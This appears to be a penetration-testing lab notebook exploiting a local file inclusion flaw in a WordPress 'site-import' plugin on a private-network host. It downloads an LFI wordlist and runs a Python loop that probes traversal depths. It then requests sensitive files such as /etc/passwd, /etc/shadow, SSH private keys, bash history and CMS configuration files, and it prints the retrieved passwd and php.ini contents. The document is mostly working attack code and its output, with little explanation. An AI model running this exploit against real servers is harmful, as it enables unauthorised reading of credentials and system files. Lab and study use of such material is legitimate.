In [1]:
!wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

--2021-10-23 14:10:23--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5480 (5.4K) [text/plain]
Saving to: ‘LFI-gracefulsecurity-linux.txt’

LFI-gracefulsecurit 100%[===================>]   5.35K  --.-KB/s    in 0s      

2021-10-23 14:10:23 (108 MB/s) - ‘LFI-gracefulsecurity-linux.txt’ saved [5480/5480]



In [26]:
import requests

base_url = 'http://10.11.1.3/wp-content/plugins/site-import/admin/page.php?url='

def get_depth(i, suffix):
    if i==0:
        return suffix
    else:
        return "../"*i + suffix[1:]
    
base_suffix = '/etc/passwd'

for i in range(10):
    suffix = get_depth(i, base_suffix)
    response = requests.get(base_url+suffix).content
    if len(response) > 10:
        print(i)
        print(response.decode("ascii"))
        break

0
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
libstoragemgmt:x:998:997:daemon account for libsto

Other important ones:

    WordPress: /var/www/html/wp-config.php
    Joomla: /var/www/configuration.php
    Dolphin CMS: /var/www/html/inc/header.inc.php
    Drupal: /var/www/html/sites/default/settings.php
    Mambo: /var/www/configuration.php
    PHPNuke: /var/www/config.php
    PHPbb: /var/www/config.php


In [32]:
%%writefile shortlist.txt
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/var/log/messages
/var/log/cron.log
/var/log/secure or /var/log/auth.log
/var/www/html/wp-config.php
/var/www/configuration.php
/var/www/html/inc/header.inc.php
/var/www/html/sites/default/settings.php
/var/www/config.php

Writing shortlist.txt


In [31]:
def test_lfis(lines):
    for line in lines:
        suffix = get_depth(i, line[:-1])
        response = requests.get(base_url+suffix).content[:10000]
        if len(response)>0:
            print("------------------------"*5)
            print(suffix)
            print(base_url+suffix)
            try:
                print(response.decode("ascii"))
            except:
                print(response)
            print("------------------------"*5)

In [33]:
lines = open('shortlist.txt', 'r').readlines()

test_lfis(lines)

------------------------------------------------------------------------------------------------------------------------
/etc/passwd
http://10.11.1.3/wp-content/plugins/site-import/admin/page.php?url=/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/no

In [28]:
lines = open('LFI-gracefulsecurity-linux.txt', 'r').readlines()

test_lfis(lines)

------------------------------------------------------------------------------------------------------------------------
/etc/passwd
http://10.11.1.3/wp-content/plugins/site-import/admin/page.php?url=/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/no

In [23]:
suffix = '/home/techblog/.ssh/authorized_keys'

requests.get(base_url+suffix).content

b''

In [24]:
suffix = '/home/techblog/.ssh/id_rsa'

requests.get(base_url+suffix).content

b''

In [25]:
suffix = '/home/techblog/.bash_history'

requests.get(base_url+suffix).content

b''

In [27]:
suffix = '/home/techblog/.bashrc'

requests.get(base_url+suffix).content

b''

In [30]:
!curl "http://10.11.1.3/wp-content/plugins/site-import/admin/page.php?url=/etc/php.ini"

[PHP]

;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;
; PHP's initialization file, generally called php.ini, is responsible for
; configuring many of the aspects of PHP's behavior.

; PHP attempts to find and load this configuration from a number of locations.
; The following is a summary of its search order:
; 1. SAPI module specific location.
; 2. The PHPRC environment variable. (As of PHP 5.2.0)
; 3. A number of predefined registry keys on Windows (As of PHP 5.2.0)
; 4. Current working directory (except CLI)
; 5. The web server's directory (for SAPI modules), or directory of PHP
; (otherwise in Windows)
; 6. The directory from the --with-config-file-path compile time option, or the
; Windows directory (C:\windows or C:\winnt)
; See the PHP docs for more specific information.
; http://php.net/configuration.file

; The syntax of the file is extremely simple.  Whitespace and lines
; beginning with a semicolon are silently ignored (as you probably guessed).
; Section header